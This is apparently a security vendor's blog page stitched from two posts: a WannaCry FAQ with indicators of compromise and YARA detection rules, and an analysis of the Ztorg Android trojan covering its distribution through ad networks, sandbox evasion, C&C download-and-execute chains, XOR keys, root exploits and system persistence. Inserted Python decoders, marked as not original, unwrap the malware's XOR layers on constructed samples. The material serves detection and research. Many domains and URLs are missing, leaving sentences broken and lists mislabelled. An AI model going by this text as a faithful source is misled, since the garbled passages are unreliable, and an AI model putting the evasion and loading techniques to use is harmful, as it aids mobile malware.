  • For those who do not use Kaspersky Lab solutions, we suggest installing the free Kaspersky Anti-Ransomware Tool for business (KART).
  • WannaCry is also targeting embedded systems. We recommend ensuring that dedicated security solutions for embedded systems are installed, and that they have both anti-malware protection and Default Deny functionality enabled.

Did Kaspersky block the attack for every target that had the software installed?

Our recent products include a module named System Watcher, which is designed to stop ransomware attacks. It was successful in blocking the damage from Wannacry, proving once again its effectiveness. Additionally, our products include specific detection subroutines which stopped the spreading of the attacks inside local networks. Since Saturday, our products also blocked the network level attacks through IDS components.

I’m running Windows XP – how can I protect myself?

First of all, stop running Windows XP. It is a 16-year-old operating system which is no longer officially supported by Microsoft. We recommend you upgrade to Windows 8.1 or 10. If you absolutely need to run Windows XP, you can download the emergency patch from Microsoft here:

However, prepare for a rough ride ahead, as other vulnerabilities will most likely remain open and leave you vulnerable in the future to other attacks.

Do you have YARA rules and IOCs for everything we know so far?

Multiple YARA rules have been released so far, with varying degrees of accuracy. Florian Roth has published a good Wannacry YARA set on his GitHub. Another set of YARA rules has been published by US-CERT, however, they produce false positives and are not recommended at this time. Our own YARA rules can be found below.

Indicators of Compromise

Network traffic to the following hosts:

  • iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com
  • ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com

Filenames on disk:

  • mssecsvc.exe
  • taskdl.exe
  • taskse.exe
  • wannacry.exe
  • tasksche.exe

Hashes for the variants with different kill switches:

  • d5dcd28612f4d6ffca0cfeaefd606bcf
  • d724d8cc6420f06e8a48752f0da11c66

For more malware hashes, please see our previous blogpost.

Yara rules

rule crimeware_Wannacry_worm {
    meta:
        description = "Find Wannacry worm carrier samples"
        date = "2017-05-14"
        version = "1.0"
        author = "Kaspersky Lab"
        tlp = "GREEN"

    strings:
        $a0="__TREEID__PLACEHOLDER__" ascii wide fullword
        $a1="__USERID__PLACEHOLDER__" ascii wide fullword
        $a2="userid" ascii wide fullword
        $a3="treeid" ascii wide fullword
        $a4="__TREEPATH_REPLACE__" ascii wide fullword
        $a5="\\\\%s\\IPC$" ascii wide fullword
        $a6="Microsoft Base Cryptographic Provider v1.0" ascii wide fullword
        $a7="mssecsvc2.0" ascii wide fullword
        $a8="Microsoft Security Center (2.0) Service" ascii wide fullword
        $a9="%s -m security" ascii wide fullword
        $a10="C:\\%s\\qeriuwjhrf" ascii wide fullword
        $a11="tasksche.exe" ascii wide fullword

    condition:
        ((uint16(0) == 0x5A4D)) and (filesize < 15000000) and (8 of ($a*))
}

rule crimeware_Wannacry_ransomware {
    meta:
        description = "Find Wannacry ransomware module"
        date = "2017-05-14"
        version = "1.1"
        author = "Kaspersky Lab"
        tlp = "GREEN"

    strings:
        // list of extensions targeted by the ransomware module
        // (UTF-16LE, null-terminated entries; the name of this hex string is not
        // preserved on this page, and the list is cut off at the end)
        $a0 = {
            2E 00 64 00 65 00 72 00 00 00 00 00 2E 00 70 00
            66 00 78 00 00 00 00 00 2E 00 6B 00 65 00 79 00
            00 00 00 00 2E 00 63 00 72 00 74 00 00 00 00 00
            2E 00 63 00 73 00 72 00 00 00 00 00 2E 00 70 00
            31 00 32 00 00 00 00 00 2E 00 70 00 65 00 6D 00
            00 00 00 00 2E 00 6F 00 64 00 74 00 00 00 00 00
            2E 00 6F 00 74 00 74 00 00 00 00 00 2E 00 73 00
            78 00 77 00 00 00 00 00 2E 00 73 00 74 00 77 00
            00 00 00 00 2E 00 75 00 6F 00 74 00 00 00 00 00
            2E 00 33 00 64 00 73 00 00 00 00 00 2E 00 6D 00
            61 00 78 00 00 00 00 00 2E 00 33 00 64 00 6D 00
            00 00 00 00 2E 00 6F 00 64 00 73 00 00 00 00 00
            2E 00 6F 00 74 00 73 00 00 00 00 00 2E 00 73 00
            78 00 63 00 00 00 00 00 2E 00 73 00 74 00 63 00
            00 00 00 00 2E 00 64 00 69 00 66 00 00 00 00 00
            2E 00 73 00 6C 00 6B 00 00 00 00 00 2E 00 77 00
            62 00 32 00 00 00 00 00 2E 00 6F 00 64 00 70 00
            00 00 00 00 2E 00 6F 00 74 00 70 00 00 00 00 00
            2E 00 73 00 78 00 64 00 00 00 00 00 2E 00 73 00
            74 00 64 00 00 00 00 00 2E 00 75 00 6F 00 70 00
            00 00 00 00 2E 00 6F 00 64 00 67 00 00 00 00 00
            2E 00 6F 00 74 00 67 00 00 00 00 00 2E 00 73 00
            78 00 6D 00 00 00 00 00 2E 00 6D 00 6D 00 6C 00
            00 00 00 00 2E 00 6C 00 61 00 79 00 00 00 00 00
            2E 00 6C 00 61 00 79 00 36 00 00 00 2E 00 61 00
            73 00 63 00 00 00 00 00 2E 00 73 00 71 00 6C 00
            69 00 74 00 65 00 33 00 00 00 00 00 2E 00 73 00
            71 00 6C 00 69 00 74 00 65 00 64 00 62 00 00 00
            2E 00 73 00 71 00 6C 00 00 00 00 00 2E 00 61 00
            63 00 63 00 64 00 62 00 00 00 00 00 2E 00 6D 00
            64 00 62 00 00 00 00 00 2E 00 64 00 62 00 00 00
            2E 00 64 00 62 00 66 00 00 00 00 00 2E 00 6F 00
            64 00 62 00 00 00 00 00 2E 00 66 00 72 00 6D 00
            00 00 00 00 2E 00 6D 00 79 00 64 00 00 00 00 00
            2E 00 6D 00 79 00 69 00 00 00 00 00 2E 00 69 00
            62 00 64 00 00 00 00 00 2E 00 6D 00 64 00 66 00
            00 00 00 00 2E 00 6C 00 64 00 66 00 00 00 00 00
            2E 00 73 00 6C 00 6E 00 00 00 00 00 2E 00 73 00
            75 00 6F 00 00 00 00 00 2E 00 63 00 73 00 00 00
            2E 00 63 00 00 00 00 00 2E 00 63 00 70 00 70 00
            00 00 00 00 2E 00 70 00 61 00 73 00 00 00 00 00
            2E 00 68 00 00 00 00 00 2E 00 61 00 73 00 6D 00
            00 00 00 00 2E 00 6A 00 73 00 00 00 2E 00 63 00
            6D 00 64 00 00 00 00 00 2E 00 62 00 61 00 74 00
            00 00 00 00 2E 00 70 00 73 00 31 00 00 00 00 00
            2E 00 76 00 62 00 73 00 00 00 00 00 2E 00 76 00
            62 00 00 00 2E 00 70 00 6C 00 00 00 2E 00 64 00
            69 00 70 00 00 00 00 00 2E 00 64 00 63 00 68 00
            00 00 00 00 2E 00 73 00 63 00 68 00 00 00 00 00
            2E 00 62 00 72 00 64 00 00 00 00 00 2E 00 6A 00
            73 00 70 00 00 00 00 00 2E 00 70 00 68 00 70 00
            00 00 00 00 2E 00 61 00 73 00 70 00 00 00 00 00
            2E 00 72 00 62 00 00 00 2E 00 6A 00 61 00 76 00
            61 00 00 00 2E 00 6A 00 61 00 72 00 00 00 00 00
            2E 00 63 00 6C 00 61 00 73 00 73 00 00 00 00 00
            2E 00 73 00 68 00 00 00 2E 00 6D 00 70 00 33 00
            00 00 00 00 2E 00 77 00 61 00 76 00 00 00 00 00
            2E 00 73 00 77 00 66 00 00 00 00 00 2E 00 66 00
            6C 00 61 00 00 00 00 00 2E 00 77 00 6D 00 76 00
            00 00 00 00 2E 00 6D 00 70 00 67 00 00 00 00 00
            2E 00 76 00 6F 00 62 00 00 00 00 00 2E 00 6D 00
            70 00 65 00 67 00 00 00 2E 00 61 00 73 00 66 00
            00 00 00 00 2E 00 61 00 76 00 69 00 00 00 00 00
            2E 00 6D 00 6F 00 76 00 00 00 00 00 2E 00 6D 00
            70 00 34 00 00 00 00 00 2E 00 33 00 67 00 70 00
            00 00 00 00 2E 00 6D 00 6B 00 76 00 00 00 00 00
            2E 00 33 00 67 00 32 00 00 00 00 00 2E 00 66 00
            6C 00 76 00 00 00 00 00 2E 00 77 00 6D 00 61 00
            00 00 00 00 2E 00 6D 00 69 00 64 00 00 00 00 00
            2E 00 6D 00 33 00 75 00 00 00 00 00 2E 00 6D 00
            34 00 75 00 00 00 00 00 2E 00 64 00 6A 00 76 00
            75 00 00 00 2E 00 73 00 76 00 67 00 00 00 00 00
            2E 00 61 00 69 00 00 00 2E 00 70 00 73 00 64 00
            00 00 00 00 2E 00 6E 00 65 00 66 00 00 00 00 00
            2E 00 74 00 69 00 66 00 66 00 00 00 2E 00 74 00
            69 00 66 00 00 00 00 00 2E 00 63 00 67 00 6D 00
            00 00 00 00 2E 00 72 00 61 00 77 00 00 00 00 00
            2E 00 67 00 69 00 66 00 00 00 00 00 2E 00 70 00
        }

    condition:
        ((uint16(0) == 0x5A4D)) and (filesize < 15000000) and any of them
}
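To see what the second rule's hex string actually matches, here is an added decoder (not part of the original post or of the rule): each entry in that string is one file extension as a null-terminated UTF-16LE string, padded to a 4-byte boundary. The embedded excerpt is the first four lines of the rule as printed above, so its last entry is cut off, which is exactly the case the decoder has to report rather than silently drop.

```python
"""Decode the extension table from the crimeware_Wannacry_ransomware hex
string, and re-encode extensions in the same layout. Added example."""
import re

# Excerpt of the rule's hex string (first four lines, copied from the rule).
SAMPLE_HEX_EXCERPT = """
2E 00 64 00 65 00 72 00 00 00 00 00 2E 00 70 00
66 00 78 00 00 00 00 00 2E 00 6B 00 65 00 79 00
00 00 00 00 2E 00 63 00 72 00 74 00 00 00 00 00
2E 00 63 00 73 00 72 00 00 00 00 00 2E 00 70 00
"""


def hex_text_to_bytes(text):
    """Turn YARA-style hex text (two-digit tokens separated by whitespace,
    optionally wrapped in braces) into bytes."""
    return bytes(int(tok, 16) for tok in re.findall(r"\b[0-9A-Fa-f]{2}\b", text))


def decode_wide_string_table(blob):
    """Split a blob of null-terminated UTF-16LE strings.
    Returns (complete, tail): `complete` lists the terminated strings in
    order; `tail` is any unterminated text left at the end (a truncated
    entry), or '' if the blob ends cleanly."""
    complete, current = [], bytearray()
    for i in range(0, len(blob) - len(blob) % 2, 2):  # walk 16-bit code units
        unit = blob[i:i + 2]
        if unit == b"\x00\x00":
            if current:                      # terminator of an entry
                complete.append(current.decode("utf-16-le"))
                current = bytearray()
            continue                         # otherwise alignment padding
        current += unit
    tail = current.decode("utf-16-le", errors="replace") if current else ""
    return complete, tail


def targeted_extensions(hex_text):
    """Extensions encoded in a rule hex string, plus any truncated last entry."""
    return decode_wide_string_table(hex_text_to_bytes(hex_text))


def encode_entry(ext):
    """Inverse: the exact bytes the ransomware table uses for one extension
    (UTF-16LE, null terminator, then zero padding to a multiple of 4 bytes)."""
    data = ext.encode("utf-16-le") + b"\x00\x00"
    return data + b"\x00" * (-len(data) % 4)


if __name__ == "__main__":
    exts, cut = targeted_extensions(SAMPLE_HEX_EXCERPT)
    print("complete entries:", exts)
    print("truncated tail:", repr(cut))
```

Pasting the full hex string from the rule into `targeted_extensions` yields the whole list; the trailing `.p` of the excerpt shows up as the tail, not as an extension.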

Ztorg: money for infecting your smartphone

Mon, 05/15/2017 - 04:57

This research started when we discovered an infected Pokémon GO guide in Google Play. It was there for several weeks and was downloaded more than 500,000 times. We detected the malware as After some searching, I found some other similar infected apps that were being distributed from the Google Play Store. The first of them, called Privacy Lock, was uploaded to Google Play on 15 December 2016. It was one of the most popular Ztorg modifications, with more than 1 million installations.

After I started tracking these infected apps, two things struck me – how rapidly they became popular and the comments in the user review sections.

These infected apps quickly became very popular, gaining thousands of new users each day!

For example, com.fluent.led.compass had 10,000–50,000 installations the day I found and reported it to Google.

However, it still wasn’t deleted from Google Play the next day and the number of installations increased tenfold to 100,000–500,000. It means there were at least 50,000 new infected users in the space of just one day.

There were lots of comments saying that people downloaded these apps for credits/coins/etc.

In some of these comments the users mentioned other apps – Appcoins, Advertapp, etc.

That’s where this latest research work started.

Advertising Apps that pay users

The app mentioned most in the comments was Appcoins, so I installed it. After that, the app prompted me to install some other apps, including one that was malicious, for $0.05.

To be honest, I was surprised that only one was malicious – all the other apps were clean.

The funny thing is that they check for root rights on the device and don’t pay those that have them. And the first thing that Ztorg did on the device after infection started was to get superuser rights.

I contacted the Appcoins developers to try and find out where this malicious advertising offer came from, but they deleted the offer and answered me by saying there was no malware and that they had done nothing wrong.

Then I analyzed the apps installed by infected users and made a list of the most popular ones that paid users to install software:


And of course they offered malware too:

All these offered users 0.04-0.05 USD for installing an app infected with Ztorg from Google Play.

So I decided to take a closer look at these offers and the dumped traffic for these apps.

A typical session in which an advertising app turned into a malicious one was as follows:

  1. App receives offers, including malicious ones, from its server (for example, moneyrewardfun[.]com). Malicious offers are sent from well-known ad services (usually and

  2. After a few redirections from ad service domains (in one case there were 27 redirections) the app goes to or These URLs are related to the ads too.

  3. Then it redirects to

  4. And the final URL that leads to the Google Play Store was

All the offers that I was able to dump had and is a well-known “business intelligence platform”; the URLs that are used in malicious campaigns look like this:

By analyzing these URLs we can identify infected apps on Google Play.

Malicious server

URLs from look like this:|1002009&install_callback=

This URL structure (offer_id=..&aff_id=..&campaign=..) is related to the OffersLook tracking system. It contains many interesting things, like the offer id and the affiliate id. But it turns out that the cybercriminals use different values for them, making these parameters unusable for us – except one: install_callback. This parameter contains the name of the ad service.

While searching for I was able to find some APK files that contained this URL. All of those files are detected by Kaspersky Lab products as Ztorg malware. The interesting thing was that used the IP The same IP was used by, which was mentioned in CheckPoint’s gooligan report. A few weeks after that report was made public, (which wasn’t mentioned in the report) was moved to a new IP –

Ad modules

Luckily I was able to find not only in the APK files but also in network traffic from clean apps. All these apps had an advertising module – Batmobi or Mobvista in most cases. Network traffic from these ad modules looked similar to the network traffic from the apps that paid users to install promoted apps.

Here is an example of an app with a Batmobi ad module. The module received a JSON file with offers from their server

The user sees a list of advertised apps:

After the user clicks on the ads, they are redirected to the Google Play Store.

In this case, the redirects look like this: ->> -> -> -> ->

After analyzing ad campaigns containing, I was able to find almost 100 infected apps being promoted on Google Play.

The other interesting aspect of these campaigns was that their URLs contained the install_callback parameter that I mentioned earlier. Turns out the cybercriminals only used four ad networks.

Ad sources callbacks

Ad network       Share of install_callback values
Yeahmobi         41%
Mobvista         34%
Avazu            18%
Supersonicads    7%

However, this doesn’t mean that malware was only being distributed through these four networks. These ad networks are selling their ads to a wide range of advertising companies. In my research, I saw some malicious ads coming from other advertising networks like DuAd or Batmobi, but after a few redirects these ads were always pointing to one of the four advertising networks listed above.

Furthermore, I tracked several malicious ad campaigns that looked like this:

Batmobi -> Yeahmobi -> SupersonicAds

which means that these networks also redistribute ads to each other.

I wasn’t able to find any other ad networks in the install_callback parameter until the end of March 2017.
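The install_callback attribution described in the two passages above (the OffersLook URL structure and the four-network breakdown), as an added example that is not part of the original post: it checks that a URL carries the OffersLook parameter set, ignores the per-campaign values on purpose, and attributes the URL to an ad network through the callback host. All tracker and callback domains below are constructed placeholders, and the substrings used to recognise a network in a callback host are an assumption.

```python
"""Attribute OffersLook-style tracking URLs to an ad network via
install_callback and tally their share. Added example; domains constructed."""
from collections import Counter
from urllib.parse import parse_qs, urlparse

# Network names come from the post's "Ad sources callbacks" table; matching
# them by substring of the callback host is an assumption of this example.
NETWORK_MARKERS = {
    "yeahmobi": "Yeahmobi",
    "mobvista": "Mobvista",
    "avazu": "Avazu",
    "supersonicads": "Supersonicads",
}
REQUIRED_PARAMS = ("offer_id", "aff_id", "campaign")


def attribute_tracking_url(url):
    """Return (is_offerslook_style, network).
    offer_id/aff_id/campaign only prove the URL follows the tracker's scheme;
    their values change per campaign, so they are deliberately not used.
    `network` is None without a callback, 'other' for an unrecognised one."""
    query = parse_qs(urlparse(url).query)   # handles %-encoded callbacks too
    offerslook_style = all(p in query for p in REQUIRED_PARAMS)
    callback = query.get("install_callback", [""])[0]
    host = (urlparse(callback).hostname or callback).lower()
    network = next((name for marker, name in NETWORK_MARKERS.items()
                    if marker in host), None)
    if callback and network is None:
        network = "other"
    return offerslook_style, network


def network_share(urls):
    """Percentage of OffersLook-style URLs per ad network, largest first."""
    counts = Counter()
    for url in urls:
        style_ok, network = attribute_tracking_url(url)
        if style_ok and network:
            counts[network] += 1
    total = sum(counts.values())
    if not total:
        return {}
    return {net: round(100 * n / total) for net, n in counts.most_common()}


def constructed_urls():
    """Ten constructed tracker URLs (placeholder domains) in roughly the
    proportions the post reports, plus one plain ad link with no tracker
    parameters that must not be counted."""
    callbacks = (["http://cb.yeahmobi.invalid/install"] * 4
                 + ["http://track.mobvista.invalid/cb"] * 3
                 + ["http://s.avazu.invalid/postback"] * 2
                 + ["http://api.supersonicads.invalid/cb"])
    urls = [f"http://tracker.invalid/aff_c?offer_id={1000 + i}&aff_id={i % 3}"
            f"&campaign=c{i}&install_callback={cb}"
            for i, cb in enumerate(callbacks)]
    urls.append("http://ads.invalid/click?id=1")
    return urls


if __name__ == "__main__":
    for network, pct in network_share(constructed_urls()).items():
        print(f"{network:<14} {pct}%")
```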

Other sources

During my research I found some infected apps that were not promoted by these advertising networks. When I looked at their detection paths I found that there were several patterns to them. Most of the paths where these apps were detected (except the installation path /data/app) were as follows:


I analyzed the apps using these paths and discovered that all of them are already detected by Kaspersky Lab products as adware or malware. However, the apps downloaded to these folders are not all malicious – most of them are clean.

Folder’s name           Type      Detection %*
DownloadProvider        Malware   81%
TF47HV2VFKD9            Malware   56%
snowfoxcr               AdWare    51%
nativedroid             Malware   48%
.walkfree               AdWare    33%
ceroa                   AdWare    20%
sysAndroid              Malware   16%
.googleplay_download    Malware   15%

* Malicious apps that were downloaded to a specific folder as a percentage of all apps in that folder.

Infected apps Similar apps

All the infected apps that I analyzed surprised me in that they don’t look like they were patched with malware code. In many other cases, cybercriminals just add malicious code to clean apps, but not in this case. Looks like these apps were created especially for distributing malware.

Publishers from Google Play

Some of the publishers’ emails from Google Play:

  • com.equalizer.goods.listener
  • com.ele.wall.papers
  • com.voice.equalizer.musicssss
  • com.amusing.notes.done

When I started to search for them, I found that most of the emails are related to Vietnam.

For example:

  1. trantienfariwuay -> tran tien [fariwuay] – Vietnamese singer

  2. liemproduction08 -> liem production [08] – Thuat Liem Production, company from Ho Chi Minh City, Vietnam

  3. nguyenthokanuvuong -> nguyen [thokanu] vuong – Vietnamese version of Chinese name Wang Yuan

Malicious modules

Almost all of the infected apps from Google Play contain the same functionality – to download and execute the main module. During this research, I found three types of modules with this functionality.

Every infected app from Google Play with this type of malicious module was protected by a packer. I will describe the app with the package name com.equalizer.goods.listener. It was packed using the Qihoo packer. This app has many different classes, and only a few of them are related to the malicious module. The malicious code is triggered by the PACKAGE_ADDED and PACKAGE_REMOVED system events, which means it only starts executing after the user installs, updates or removes an app.

As a first step, the malicious module will check if it’s running on a virtual machine, emulator or sandbox. To do so, it will check several dozen files that exist on different machines and several dozen values for different system properties. If this check is passed, the Trojan will start a new thread.

In this new thread the Trojan will wait a random amount of time, between an hour and an hour and a half. After waiting, it will make an HTTP GET request to the C&C ( and, as a result, the Trojan will receive a JSON file encrypted with DES. This JSON should contain a URL from which a file can be downloaded. The file is an XORed JAR that contains the malicious classes.dex – the main module.

Since October 2016 I’ve reported lots of apps with this malicious module to Google, so they were able to improve their detection system and catch almost all of them. This meant the cybercriminals had to bypass this detection. In the beginning they changed some methods in the code and used commercial packers. But in February 2017 they rewrote the entire code, moving all functionality to the ELF (native, .so) library.

Example: com.unit.conversion.use (MD5: 92B02BB80C1BC6A3CECC321478618D43)

The malicious code is triggered after app execution starts from the onCreate method.

The malicious code in the infected classes.dex is simple – it starts a new thread that loads the MyGame library and it has two methods for dealing with sandbox detections, which will be executed from the library.

In this version, the delays are much smaller than in the previous one – it waits only 82 seconds before execution.

After starting, the MyGame library will check if it’s running in a sandbox by executing the two methods from classes.dex. One will try to register the receiver for the BATTERY_CHANGED action and check if it’s correct. Another method will try to get application info about the package (Google Play Store) with the MATCH_UNINSTALLED_PACKAGES flag. If both of these methods return “false”, the malicious library will execute a GET request to the command server.

The library will decode this answer and XOR it with the key 0x66.

    g_class_name = b.a.b.a
    g_method_name = b
    g_url =
    g_key = 80

The .apk file available at g_url will be downloaded into the cache folder of the app folder (/data/data/<package_name>/cache). The library will xor it with g_key and load it using a ClassLoad method from the DexClassLoader class.

As we can see, the cybercriminals changed a lot in the malicious code, and replaced the Java code with C code. But the functionality remains the same – connect to the C&C, download and execute the main module.
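The defender-side inverse of the steps just described, as an added example that is neither Ztorg code nor part of the original post: undo the 0x66 XOR on the C&C reply, pull out the g_ settings, and undo the g_key XOR on the cached download. It assumes that the reply, after whatever transport decoding the post does not spell out, is plain "name = value" text under a single-byte XOR; that g_key (80 above, read here as decimal) is likewise a single-byte XOR key for the APK; and that the third module type's 0x12 asset uses the same scheme. The reply and payload bytes are constructed, with a placeholder URL.

```python
"""Undo Ztorg's XOR layers: C&C reply (0x66) and downloaded APK (g_key).
Added example; sample reply and payload are constructed, not captured."""


def xor_bytes(data, key):
    """Single-byte XOR; applying it twice restores the input."""
    return bytes(b ^ (key & 0xFF) for b in data)


def parse_config(text):
    """Parse 'name = value' lines into a dict, ignoring anything else."""
    cfg = {}
    for line in text.splitlines():
        if "=" in line:
            name, value = line.split("=", 1)
            cfg[name.strip()] = value.strip()
    return cfg


def decode_cnc_reply(reply, key=0x66):
    """Recover g_class_name, g_method_name, g_url and g_key from a reply."""
    cfg = parse_config(xor_bytes(reply, key).decode("utf-8", errors="replace"))
    if "g_key" in cfg:
        cfg["g_key"] = int(cfg["g_key"])   # assumption: decimal, as printed above
    return cfg


ZIP_MAGIC = b"PK\x03\x04"   # an APK/JAR is a zip archive


def unwrap_payload(blob, key):
    """XOR the cached download with g_key and check it became a zip archive."""
    plain = xor_bytes(blob, key)
    if not plain.startswith(ZIP_MAGIC):
        raise ValueError("not a zip/APK after XOR: wrong key or not this scheme")
    return plain


def recover_single_byte_key(blob, known_prefix=ZIP_MAGIC):
    """Forensics shortcut: a single-byte XOR of a file with a known header
    leaks the key, so a file from the app's cache folder can be unwrapped
    without the C&C reply. Returns the key, or None if the bytes disagree."""
    if len(blob) < len(known_prefix):
        return None
    candidates = {c ^ p for c, p in zip(blob, known_prefix)}
    return candidates.pop() if len(candidates) == 1 else None


# Constructed sample data: a reply in the decoded format shown above with a
# placeholder URL, and a minimal fake APK (zip header followed by zeros).
SAMPLE_PLAINTEXT = ("g_class_name = b.a.b.a\n"
                    "g_method_name = b\n"
                    "g_url = http://cnc.placeholder.invalid/main.apk\n"
                    "g_key = 80\n")
SAMPLE_REPLY = xor_bytes(SAMPLE_PLAINTEXT.encode(), 0x66)
FAKE_APK = ZIP_MAGIC + b"\x14\x00" + bytes(26)


if __name__ == "__main__":
    cfg = decode_cnc_reply(SAMPLE_REPLY)
    print(cfg)
    cached = xor_bytes(FAKE_APK, cfg["g_key"])   # what lands in the cache folder
    print("key recovered from header:", recover_single_byte_key(cached))
    print("payload is zip:", unwrap_payload(cached, cfg["g_key"]).startswith(ZIP_MAGIC))
```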

Detection bypassing

Once I was able to receive the package IDs from these campaigns, I installed the infected app from Google Play on my test device and… nothing happened. After some investigating, I found that the cybercriminals only return a malicious payload to users that install apps via ads. However, some of the other infected apps started to infect my test phone when installed directly from Google Play – without clicking on any ads.

In April 2017 the cybercriminals changed their Ztorg code again. In this third type of malicious module, the cybercriminals moved all the functionality back to classes.dex. The main difference from the previous version is that it’s no longer a Trojan-Downloader: it doesn’t download the main module from a malicious server; instead it contains an encrypted module in the Assets folder of the installation package. The file called is XORed with 0x12 and then loaded using the ClassLoad method.

Payload (main module)

In all the attacks that I analyzed the main module had the same functionality. I’ll describe one of the most recent – 2dac26e83b8be84b4a453664f68173dd. It was downloaded by the com.unit.conversion.use app using the malicious MyGame library.

This module is downloaded by the infection module and loaded using the ClassLoad method. The main purpose of the module is to gain root rights and install other modules. It does this by downloading or dropping some files.

Some files can only be dropped from this module; there are no URLs for them.

Some of the URLs with the domain didn’t work at the time of this research. All files that have these URLs can be dropped. All files that have URLs only and cannot be dropped have URLs with the domains and, which were accessible at the time of this research.

In one of the previous versions of the main module, dated September 2016, all the URLs had the domain and were available at that time.

Some of the dropped/downloaded malicious files will be added to the /system/etc/ file. It means that these files will remain on the device even after a reset to factory settings.

All files that are dropped and downloaded by this module can be divided into a few groups:

Clean files, tools

File name                    Tool name    MD5
data/files/.zog/.a           chattr       9CAE8D66BE1103D737676DBE713B4E52
data/files/.zog/.a           chattr       1E42373FA7B9339C6C0A2472665BF9D4
data/files/.zog/supolicy     supolicy     cdceafedf1b3c1d106567d9ff969327a
data/files/.zog/busybox      busybox      3bc5b9386c192d77658d08fe7b8e704f
data/files/.zog/.j           Patched su   8fb60d98bef73726d4794c2fc28cd900

Exploits, exploit packs, exploit droppers

File name                 Name            MD5                                 Detection name
data/files/.Ag/Agcr       Agcr32          D484A52CFB0416CE5294BF1AC9346B96
data/files/.Ag/Agcr       Agcr64          B111DD21FD4FCEFDC8268327801E55CE
data/files/.zog/.ag/bx    Bx              70EBFA94C958E6E6A7C6B8CD61B71054    Exploit.AndroidOS.Lotoor.bu
data/files/.zog/.ag/cx    cx              892E033DA182C06794F2B295377B8A65    Exploit.AndroidOS.Lotoor.bu
data/files/.zog/exp       exp             6E17234C57308012911C077A376538DC
data/files/.zog/.ag/      maink.apk/boy   ab9202ccfdd31e685475ba895d1af351    script
data/files/.zog/.ag/      maink.apk/bx    70ebfa94c958e6e6a7c6b8cd61b71054    Exploit.AndroidOS.Lotoor.bu
data/files/.zog/.ag/ym    ym32            F973BAA67B170AB52C4DF54623ECF8B3    Exploit.AndroidOS.Lotoor.bu
data/files/.zog/.ag/ym    ym64            807A6CF3857012E41858A5EA8FBA1BEF    Exploit.AndroidOS.Lotoor.bu
data/files/.zog/.aa       mainp.apk/r1    c27e59f0f943cf7cc2020bda7efb442a
data/files/.zog/.aa       mainp.apk/r2    368df668d4b62bdbb73218dd1f470828
data/files/.zog/.aa       mainp.apk/r3    fb8449d1142a796ab1c8c1b85c7f6569
data/files/.zog/.aa       mainp.apk/r4    04dd488783dffcfd0fa9bbac00dbf0f9    Exploit.Linux.Enoket.a
data/files/.zog/.ad       mainmtk.apk     b4b805dc90fa06c9c7e7cce3ab6cd252
data/files/.zog/.ag/np    np              1740ae0dc078ff44d9f229dccbd9bf61    Exploit.Linux.Enoket.a

Most of these files will be downloaded by the Trojan, but some of them can only be dropped from the Trojan body. However, most of the downloaded files are the same as they were seven months ago in September 2016.

Native (ELF) malicious modules

File name              MD5                                 Path after infection     Detection name
data/files/.zog/.am    b30c193f98e83b7e6f086bba1e17a9ea    /system/xbin/.gasys      Backdoor.AndroidOS.Ztorg.j
data/files/.zog/.an    41ab20131f53cbb6a0fb69a143f8bc66    /system/lib/             Backdoor.AndroidOS.Ztorg.j
data/files/.zog/.b     ae822aed22666318c4e01c8bd88ca686    /system/xbin/.gap.a      Backdoor.AndroidOS.Ztorg.c
data/files/.zog/.k     5289027ca9d4a4ed4663db445d8fc450    /system/bin/debuggerd    Backdoor.AndroidOS.Ztorg.c
data/files/.zog/.m     5af47875666c9207110c17bc8627ce30    /system/bin/ddexe        script
data/files/.zog/.c     d335ac148f6414f0ce9c30ac63c20482    /system/xbin/.gap        Backdoor.AndroidOS.Ztorg.c

All of these files can only be dropped from the Trojan’s body. They are not downloaded.

Malicious apps

File name              Name         MD5                                 Path after infection           Detection name
data/files/.zog/.l     mains.apk    87030ae799e72994287c5b37f6675667    /system/priv-app/dpl.apk
data/files/.zog/.o     mains2.apk   93016a4a82205910df6d5f629a4466e9    /system/priv-app/.gmq.apk     Trojan.AndroidOS.Boogr.gsh
data/files/.zog/.n     mainm.apk    6aad1baf679b42adb55962cdb55fb28c    /system/priv-app/.gma.apk     Backdoor.AndroidOS.Ztorg.a
data/files/.zog/.al    .al          7d7247b4a2a0e73aaf8cc1b5c6c08221    /system/priv-app/.gmtgp.apk   Trojan.AndroidOS.Hiddad.c

.gmtgp.apk (7d7247b4a2a0e73aaf8cc1b5c6c08221)

This app is detected as Trojan.AndroidOS.Hiddad.c. It downloads (from the C&C an additional encrypted module, decrypts and loads it. In my case it downloads Trojan-Clicker.AndroidOS.Gopl.a (af9a75232c83e251dd6ef9cb32c7e2ca).

Its C&C is; additional domains are and

The Trojan uses accessibility services to install (or even buy) apps from the Google Play Store.

It also downloads apps into the .googleplay_download directory on the SD card and installs them using accessibility services to click buttons. The folder .googleplay_download is one of the sources used to spread the Ztorg Trojan. It can click buttons that use one of 13 languages – English, Spanish, Arabic, Hindi, Indonesian, French, Persian, Russian, Portuguese, Thai, Vietnamese, Turkish and Malay.

dpl.apk (87030AE799E72994287C5B37F6675667)

This module contains the same methods to detect emulators, sandbox and virtual machines as in the original infected module.

It downloads an encrypted file from the C&C into the file /.androidsgqmdata/isgqm.jar. After decryption, the Trojan loads this file.

The main purpose of dpl.apk is to download and install apps. It receives commands from the following C&Cs:


The module downloads them into the DownloadProvider directory on the SD card. This folder is one of the sources used to distribute the Ztorg Trojan.

In my case, it downloaded five malicious APKs; four of them were installed and listed in the Installed apps section.

.gma.apk (6AAD1BAF679B42ADB55962CDB55FB28C)

This Trojan tries to download the additional isgqm.jar module with the main functionality in the same way as the other modules. Unfortunately, its C&Cs (,,, didn’t return any commands, so I don’t know the main purpose of this app.

This app can modify /system/etc/, and download files to the /.androidgp/ folder on the SD card. These files will be installed in the system folders (/system/app/ or /system/priv-app/).

I assume this Trojan is needed to update other modules.

.gmq.apk (93016a4a82205910df6d5f629a4466e9)

This Trojan wasn’t able to download its additional module isgq.jar from the C&Cs (,,

Installed apps

The following apps were silently downloaded and installed on the device after infection. All of them have some well-known ad services.

Package Name | Detection | Md5 | Ad modules
co.uhi.tadsafa | Trojan-Downloader.AndroidOS.Rootnik.g | d1ffea3d2157ede4dcc029fb2e1c3607 | mobvista, batmobi
com.friend.booster | | 5c99758c8622339bffddb83af39b8685 | mobvista, batmobi
sq.bnq.gkq | Trojan-Downloader.AndroidOS.Rootnik.g | 10272af66ab81ec359125628839986ae | mobvista, batmobi
| | 8572aec28df317cd840d837e73b2554a | mobvista

They also have malicious modules that start downloading ads and apps when commanded by their C&C.

But using clean advertising networks like Mobvista and Batmobi creates an ad recursion, because these ads were used to distribute the original infected app.

